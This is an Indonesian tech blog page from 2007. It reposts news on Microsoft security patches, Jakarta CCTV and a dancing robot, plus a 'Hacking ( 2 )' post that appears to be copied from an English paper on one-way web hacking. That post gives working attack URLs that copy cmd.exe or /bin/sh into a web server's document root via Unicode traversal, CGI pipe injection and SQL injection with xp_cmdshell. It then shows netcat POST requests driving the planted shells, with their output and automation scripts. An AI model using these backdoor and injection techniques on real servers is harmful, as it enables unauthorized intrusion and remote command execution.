CK Cybers Time

Current time in Jakarta -

Thursday, August 16, 2007

Patch Baru Microsoft

Sembilan Patch Keamanan Terbaru dari Microsoft


Image Seattle, 14 Agustus 2007 - Microsoft Corp mengeluarkan patch-patch baru untuk mengatasi sembilan celah keamanan krusial yang ditemukan pada sistem mereka. Termasuk empat patch untuk mencegah hacker jahat masuk ke dalam komputer pengguna melalui halaman web.

Microsoft memberikan rating “kritis” pada empat patch terbaru yang berkaitan dengan aktivitas browsing web. Update ini berdampak pada beberapa versi Windows, Server, dan Office, termasuk di dalamnya Windows XP dan Windows Vista. Ke empat patch ini dimaksudkan untuk mencegah infiltrasi hacker ke dalam komputer pengguna melalui website khusus.

Dua update kritis lainnya ditargetkan untuk menutup lubang keamanan yang terdapat pada spreadsheet Excel. Selain itu update ini juga ditujukan untuk aplikasi-aplikasi yang memungkinkan pengguna untuk membuka image dari dalam e-mail ataupun sebuah website.

Meskipun para pembuat aplikasi menyatakan bahwa Windows Vista adalah sistem operasi yang paling aman saat ini, namun, pada kenyataannya salah satu patch penting yang dikeluarkan oleh Microsoft ini memperbaiki lubang keamanan pada aplikasi “Gadgets” yang ada di Vista. Salah satu fungsi Gadgets ini adalah mengirimkan berita-berita terbaru melalui sebuah RSS (Really Simple Syndication) Feeds.

Pengguna yang mendaftar pada sebuah RSS Feed jahat, menambah daftar kontak gadungan, atapun mengklik link palsu akan membuka pintu bagi seorang hacker jahat untuk masuk ke dalam sistem mereka.

Patch penting lainnya terkait dengan penutupan lubang keamanan pada Windows Media Player dan juga aplikasi yang memungkinkan pengguna untuk menjalankan komputer virtual pada PC mereka.

Menurut Amol Sarwate, Manager dari pusat penelitian keamanan dari perusahaan Qualys, “Hackers semakin sering mencari cara untuk menyerang pengguna biasa melalui suatu halaman web”.

“Apa yang kita hadapi sekarang ini adalah pelopor baru dalam serangan berbasis web melalui file gambar, skin media player, gadget dan titik lainnya yang berhubungan dengan web,” tambah Sarwate.

Menurutnya, Staff IT pada perusahaan-perusahaan besar sudah semakin sadar dan siap dalam mengatasi permasalahan keamanan pada saat mereka menjalankan aplikasi server. Oleh karena itu, para penyerang memfokuskan diri pada kelengahan pengguna biasa terhadap keamanan komputer mereka.

Pengguna Windows dapat mengunjungi Website Sekuriti Windows untuk mendapatkan update-update ini. Mereka juga dapat mengkonfigurasi komputer mereka untuk melakukan update otomatis setiap bulannya.


Source: Yahoo News
Posted by at

Monday, August 13, 2007

CCTV Awasi Jakarta

Jakarta, Sejumlah titik rawan dan tempat strategis di DKI Jakarta telah diawasi kamera closed-circuit television (CCTV). Dari 160 kamera yang direncanakan, 100 di antaranya telah beroperasi dan dikendalikan operator Crisis Center DKI Jakarta.

Sebanyak 25 operator yang berasal dari Dinas Trantib akan berkoordinasi dengan seluruh dinas di lingkungan Pemprov DKI dalam proses pemberian informasi.

Mereka dilatih langsung oleh guru-guru dari sekolah tinggi pemadam kebakaran Prancis.

"Saya bangga dan berterimakasih pada Prancis yang telah memberi sarana, prasarana dan teknologi canggih. Diharapkan kita bisa hadapi bencana besar," kata Sekretaris Daerah Pemprov DKI Ritola Tasmaya.

Hal itu dia sampaikan saat menutup pelatihan operator pengendali operasional penanggulangan bencana di Crisis Center Penanggulangan Bencana, Gedung Balaikota, Jl Medan Merdeka Selatan, Jakarta Pusat, Jumat (10/8/2007).

Sebelumnya, RI dan Prancis telah menandatangani MoU untuk penguatan kapasitas manajemen kebencanaan. Pemerintah Prancis memberi bantuan peralatan. Antara lain berupa alat komunikasi yang memiliki fungsi berlapis, seperti internet dan telepon satelit.

"Total seluruhnya dana yang dikeluarkan 5 juta euro untuk 7 lokasi," kata International Project Manager Civipol Counsel, Bruno Maestracci.

Ketujuh wilayah itu meliputi Jakarta (Bakornas dan Balaikota), Padang dan Banda Aceh. 3 Kota yang akan menyusul Jambi, Bali, dan Yogyakarta.



Source : DetikInet
Posted by at

Robot Jepang

Robot berdansa (cvl.iis.u-tokyo.ac.jp)

Tokyo, Di Jepang, perkembangan robot memang cukup pesat. Mulai dari robot pembantu hingga robot pengganti dokter. Kini, robot yang mampu berdansa pun hadir.

Para ilmuwan dari University of Tokyo telah berhasil menciptakan robot yang bisa mengikuti gerakan penari manusia. Ya, robot yang bisa berdansa seperti layaknya manusia.

Pembuatan robot HRP-2 bipedal yang bisa berdansa tersebut digagas oleh Shin'ichiro Nakaoka dan dibantu oleh rekan-rekan dari universitas Tokyo. Teknologi yang digunakan adalah teknologi penangkap gerakan, sehingga gerakan dansa seseorang bisa terekam dan segera diikuti oleh sang robot.

Walau kemampuan robot itu bisa dikatakan tidak meragukan, namun ada beberapa hal yang menjadi problem. Yaitu mem-program sang robot agar tetap dapat mengikuti gerakan yang sulit namun dengan keseimbangan yang tetap baik.

Seperti dilansir Vnunet , tak lama lagi, dunia akan menyaksikan robot tersebut menari tarian balet 'Swan Lake'. Namun, menurut para ilmuwan, robot ini tidak bisa mengikuti melakukan balet yang seringkali loncat dan membiarkan kedua kakinya di udara beberapa kali.

Hingga saat ini, robot tersebut telah didemonstrasikan dan menari tarian tradisional Jepang, 'Aizu-Bandaisan' yang banyak mengunakan gerakan badan daripada kaki



Source : DetikInet
Posted by at

Thursday, August 9, 2007

Hacking ( 2 )

2.0 Flowchart for a one-way web hack

Consider the example where an attacker finds a vulnerable web application, and is able to exploit it using techniques such as the ones mentioned previously. The attacker has achieved arbitrary command execution, but due to the restrictive firewall, is unable to proceed further into the network. To make an attack effective, two things are essential:

  1. Interactive terminal access - for running commands to pilfer the attacked server or penetrate further into the network.
  2. File transfer access - for transferring attack tools such as port scanners, rootkits, etc.
A tight firewall can make it very difficult to achieve the above objectives, however, it is not impossible. To get around these restrictions, with a little bit of web application programming knowledge, we can create a web based command prompt and a file uploader.

Before proceeding further we shall take a preview of the various stages of the one-way hack, as illustrated by the following diagram:

3.0 Finding the entry point

The one-way hack begins when we are able to achieve remote command execution on the target web server. We can use any of the common techniques used to attack web servers. We shall present a few examples of various ways of achieving remote command execution based on different types of URL mappings as described previously. A detailed discussion on web server and application vulnerabilities is beyond the scope of this paper.

Our objective is to create a backdoor by moving the shell interpreter (/bin/sh, cmd.exe, etc) to an area within the web server's document root. This way, we can invoke the shell interpreter through a URL. We present three examples which illustrate how to create backdoors using various exploitation techniques.

The diagram below illustrates some of the techniques used to find an entry point:

3.0.1 Exploiting URL parsing

The Unicode / Double decode attack is a classic example of a URL parsing vulnerability. The URL below copies the command interpreter - cmd.exe - into the "scripts/" directory within the web server's document root: 

http://www1.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+
    c:\winnt\system32\cmd.exe+c:\inetpub\scripts

3.0.2 Exploiting poorly validated input parameters

In this example, an unchecked parameter is passed from the URL to a Perl CGI script news.cgi using the open() call in an insecure manner: 

http://www2.example.com/cgi-bin/news.cgi?story=101003.txt|cp+/bin/sh+
    /usr/local/apache/cgi-bin/sh.cgi|

The shell (/bin/sh) gets copied into the cgi-bin directory as sh.cgi.

3.0.3 Exploiting SQL injection

Here, we show how SQL injection can be used to invoke a stored procedure on a database server, and run commands via the stored procedure: 

http://www3.example.com/product.asp?id=5%01EXEC+master..xp_cmdshell+
   'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\'

3.1 Invoking the command interpreter

Our objective of creating a backdoor by moving the command interpreter or the shell into the web document root is to be able to invoke it remotely over HTTP. The HTTP POST method is best suited for this purpose. Using POST, the input data gets passed to the invoked resource over standard input, and the web server returns the output generated by standard output back over the HTTP connection.

We shall illustrate how to send commands to command interpreters over POST, with two examples - one for CMD.EXE on IIS and Windows NT and the other for sh.cgi (which is a copy of /bin/sh) on Apache and Linux.

3.1.1 POSTing commands to CMD.EXE

The example below shows two commands being run with CMD.EXE, which is accessible on http://www1.example.com/scripts/cmd.exe. The POST request is shown in blue letters. 

$ nc www1.example.com 80
POST /scripts/cmd.exe HTTP/1.0
Host: www1.example.com
Content-length: 17

ver
dir c:\
exit

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:13:19 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00  05:28a                  WINNT
10/04/00  05:31a                  Program Files
10/04/00  05:37a                  TEMP
10/04/00  07:01a                  Inetpub
10/04/00  07:01a                  certs
11/28/00  05:12p                  software
12/06/00  03:46p                  src
12/07/00  12:50p                  weblogic
12/07/00  12:53p                  weblogic_publish
12/07/99  01:11p                  JavaWebServer2.0
12/07/99  06:49p           134,217,728 pagefile.sys
12/07/99  07:24a                  urlscan
12/07/99  04:55a                  Netscape
           13 File(s)    134,217,728 bytes
                         120,782,848 bytes free

C:\Inetpub\scripts>exit
$

Some care needs to be taken in order for CMD.EXE to receive the commands properly, and for the web server to return the output of CMD.EXE properly. In the above example, we have included the "exit" command to ensure that the input stream to CMD.EXE terminates properly. The Content-length of the POST request is also calculated accordingly, keeping in mind the extra characters taken by "exit"

3.1.2 POSTing commands to /bin/sh

The example below shows three commands being run with /bin/sh, which is accessible on http://www2.example.com/cgi-bin/sh.cgi. The POST request is shown in bold letters. 

$ nc www2.example.com 80
POST /cgi-bin/sh.cgi HTTP/1.0
Host: www2.example.com
Content-type: text/html
Content-length: 60


echo 'Content-type: text/html'
echo
uname
id
ls -la /
exit

HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:47:20 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html

Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x   19 root     root         4096 Feb  2  2002 .
drwxr-xr-x   19 root     root         4096 Feb  2  2002 ..
drwxr-xr-x    2 root     root         4096 Jun 20  2001 bin
drwxr-xr-x    2 root     root         4096 Nov 28 02:01 boot
drwxr-xr-x    6 root     root        36864 Nov 28 02:01 dev
drwxr-xr-x   29 root     root         4096 Nov 28 02:01 etc
drwxr-xr-x    8 root     root         4096 Dec  1  2001 home
drwxr-xr-x    4 root     root         4096 Jun 19  2001 lib
drwxr-xr-x    2 root     root        16384 Jun 19  2001 lost+found
drwxr-xr-x    4 root     root         4096 Jun 19  2001 mnt
drwxr-xr-x    3 root     root         4096 Feb  2  2002 opt
dr-xr-xr-x   37 root     root            0 Nov 28  2003 proc
drwxr-x---    9 root     root         4096 Feb  9  2003 root
drwxr-xr-x    3 root     root         4096 Jun 20  2001 sbin
drwxrwxr-x    2 root     root         4096 Feb  2  2002 src
drwxrwxrwt    7 root     root         4096 Nov 28 02:01 tmp
drwxr-xr-x    4 root     root         4096 Feb  2  2002 u01
drwxr-xr-x   21 root     root         4096 Feb  2  2002 usr
drwxr-xr-x   16 root     root         4096 Jun 19  2001 var
$

The care and feeding of /bin/sh over Apache is slightly different. Apache expects a well formed HTTP response header from all its CGI programs, hence we have to prepend the lines "Content-type: text/html" in the output. The two "echo" commands are for this purpose.

3.1.3 Automating the POST process

We have created two Perl scripts post_cmd.pl and post_sh.pl to automate the task of preparing the proper POST requests for the commands and sending them to the web server. The syntax for invoking post_cmd.pl is as follows:

usage: post_cmd.pl url [proxy:port] <>

post_cmd.pl is written such that it can tunnel the POST requests over an HTTP proxy server as well. post_sh.pl is on similar lines.

The examples below show the same results being derived using the Perl scripts instead of forming our own POST requests:

Output of post_cmd.pl

$ ./post_cmd.pl http://www1.example.com/scripts/cmd.exe
ver
dir c:\
^D
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:05:46 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00  05:28a                  WINNT
10/04/00  05:31a                  Program Files
10/04/00  05:37a                  TEMP
10/04/00  07:01a                  Inetpub
10/04/00  07:01a                  certs
11/28/00  05:12p                  software
12/06/00  03:46p                  src
12/07/00  12:50p                  weblogic
12/07/00  12:53p                  weblogic_publish
12/07/99  01:11p                  JavaWebServer2.0
12/07/99  06:49p           134,217,728 pagefile.sys
12/07/99  07:24a                  urlscan
12/07/99  04:55a                  Netscape
           13 File(s)    134,217,728 bytes
                         120,782,848 bytes free

C:\Inetpub\scripts>exit
$

Output of post_sh.pl

$ ./post_sh.pl http://www2.example.com/cgi-bin/sh.cgi
uname
id
ls -la /
^D
HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:43:54 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html

Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x   19 root     root         4096 Feb  2  2002 .
drwxr-xr-x   19 root     root         4096 Feb  2  2002 ..
drwxr-xr-x    2 root     root         4096 Jun 20  2001 bin
drwxr-xr-x    2 root     root         4096 Nov 28 02:01 boot
drwxr-xr-x    6 root     root        36864 Nov 28 02:01 dev
drwxr-xr-x   29 root     root         4096 Nov 28 02:01 etc
drwxr-xr-x    8 root     root         4096 Dec  1  2001 home
drwxr-xr-x    4 root     root         4096 Jun 19  2001 lib
drwxr-xr-x    2 root     root        16384 Jun 19  2001 lost+found
drwxr-xr-x    4 root     root         4096 Jun 19  2001 mnt
drwxr-xr-x    3 root     root         4096 Feb  2  2002 opt
dr-xr-xr-x   37 root     root            0 Nov 28  2003 proc
drwxr-x---    9 root     root         4096 Feb  9  2003 root
drwxr-xr-x    3 root     root         4096 Jun 20  2001 sbin
drwxrwxr-x    2 root     root         4096 Feb  2  2002 src
drwxrwxrwt    7 root     root         4096 Nov 28 02:01 tmp
drwxr-xr-x    4 root     root         4096 Feb  2  2002 u01
drwxr-xr-x   21 root     root         4096 Feb  2  2002 usr
drwxr-xr-x   16 root     root         4096 Jun 19  2001 var
$
In this manner, we can issue multiple commands to the target web server using HTTP POST requests. This concept shall be used to create arbitrary files on the web server, as discussed in section 4.1
Posted by at
Subscribe to: Posts (Atom)